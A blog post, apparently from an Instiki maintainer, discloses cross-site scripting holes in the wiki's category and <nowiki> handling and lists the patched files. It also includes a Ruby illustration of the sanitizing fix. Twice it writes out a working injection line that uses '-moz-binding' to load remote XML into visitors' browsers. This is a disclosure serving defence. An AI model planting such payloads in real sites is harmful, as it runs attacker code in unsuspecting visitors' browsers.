XSS 2
How embarrassing!
Volker asked some pointed questions about the security of Instiki. I gamely tried to respond, and proffered that, among other things, Instiki has a pretty darned good XSS Sanitizer.
Well, that got me to thinking. A sanitizer is only effective on those things which it … well … sanitizes. Which prompted me to wonder: are there things which Instiki should be sanitizing, but isn’t?
Yup. Categories. Go to an unprotected Instiki wiki, edit a page and add the line
:category: <p style="-moz-binding:url('http://golem.ph.utexas.edu/~distler/blog/files/warning2.xml#xss')"></p>
When you save the page, nothing much seems amiss. But if you visit the “All Pages” or “Recently Revised” links, at the top of the page, in a Mozilla-based browser, you’ll be in for a delightful surprise.
Update (9/11/2007):
For even more immediate gratification, try inserting
<nowiki><p style="-moz-binding:url('http://golem.ph.utexas.edu/~distler/blog/files/warning2.xml#xss')"></p></nowiki>
Sheesh! On an unprotected Instiki installation, <nowiki> means “no sanitize.”
If you’re running a copy of my branch of Instiki, update to the latest.
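To make the two gaps concrete, here is an added toy model (my own illustration, not Instiki's lib/chunks code nor the patched files) of a “:category:” line and a <nowiki> chunk, rendered once the way the post describes (chunk text emitted verbatim) and once with the chunk text sent through a sanitizer first. The sanitizer stand-in (plain HTML escaping), the function names and the sample page source with its placeholder URL are assumptions for the example.

```ruby
# Added example, not Instiki's own code. A cut-down model of the two chunk
# types from the post: ":category:" lines are lifted out of the page body and
# later listed on "All Pages"; <nowiki> bodies pass through with wiki markup
# disabled. The bug was that neither path went through the sanitizer.
CATEGORY_RE = /\A:category:\s*(.*)\z/
NOWIKI_RE   = %r{<nowiki>(.*?)</nowiki>}m

# Stand-in for the sanitizer: escapes every tag and attribute character.
# Instiki's real sanitizer allows a safe HTML subset; escaping everything is
# the conservative choice for this illustration.
ESCAPES = { '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
            '"' => '&quot;', "'" => '&#39;' }.freeze
def sanitize_fragment(text)
  text.gsub(/[&<>"']/, ESCAPES)
end

# Extract categories and expand <nowiki> chunks. With sanitize_chunks: false
# this reproduces the flaw (chunk text is emitted verbatim); with true, every
# chunk is sanitized before it can reach any rendered page.
def render(source, sanitize_chunks:)
  filter = sanitize_chunks ? ->(s) { sanitize_fragment(s) } : ->(s) { s }
  categories = []
  body_lines = []
  source.each_line do |line|
    if (m = CATEGORY_RE.match(line.chomp))
      m[1].split(',').each { |c| categories << filter.call(c.strip) }
    else
      body_lines << line
    end
  end
  body = body_lines.join.gsub(NOWIKI_RE) { filter.call($1) }
  { categories: categories, body: body }
end

# The "All Pages" listing: category names land inside the HTML of a page the
# visitor never edited, which is why an unsanitized category is an XSS.
def all_pages_html(categories)
  '<ul>' + categories.map { |c| "<li>#{c}</li>" }.join + '</ul>'
end

# Constructed page source in the shape of the post's examples, with a
# placeholder URL instead of the one from the post.
SAMPLE = ":category: math, <p style=\"-moz-binding:url('http://placeholder.invalid/b.xml#x')\"></p>\n" \
         "Hello <nowiki><b>raw</b></nowiki> world\n"

if __FILE__ == $PROGRAM_NAME
  puts all_pages_html(render(SAMPLE, sanitize_chunks: false)[:categories])
  puts all_pages_html(render(SAMPLE, sanitize_chunks: true)[:categories])
end
```

Run it and compare the two listings: the first carries the raw <p> element with its style attribute into "All Pages", the second carries only escaped text.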
Update (9/23/2007):
I was finally granted commit access to the Instiki SVN repository, and uploaded the necessary patched files to the trunk. If you’re still using the original version of Instiki, you should download the following files:
lib/sanitize.rb
lib/chunks/category.rb
lib/chunks/nowiki.rb
lib/chunks/chunk.rb
test/unit/chunks/category_test.rb
test/unit/chunks/nowiki_test.rb
Hopefully, Matthias will get a new release out the door, in the not-too-distant future.
I suppose this is not exactly going to bolster Volker’s confidence in the product. But I think I get good marks for fast turnaround.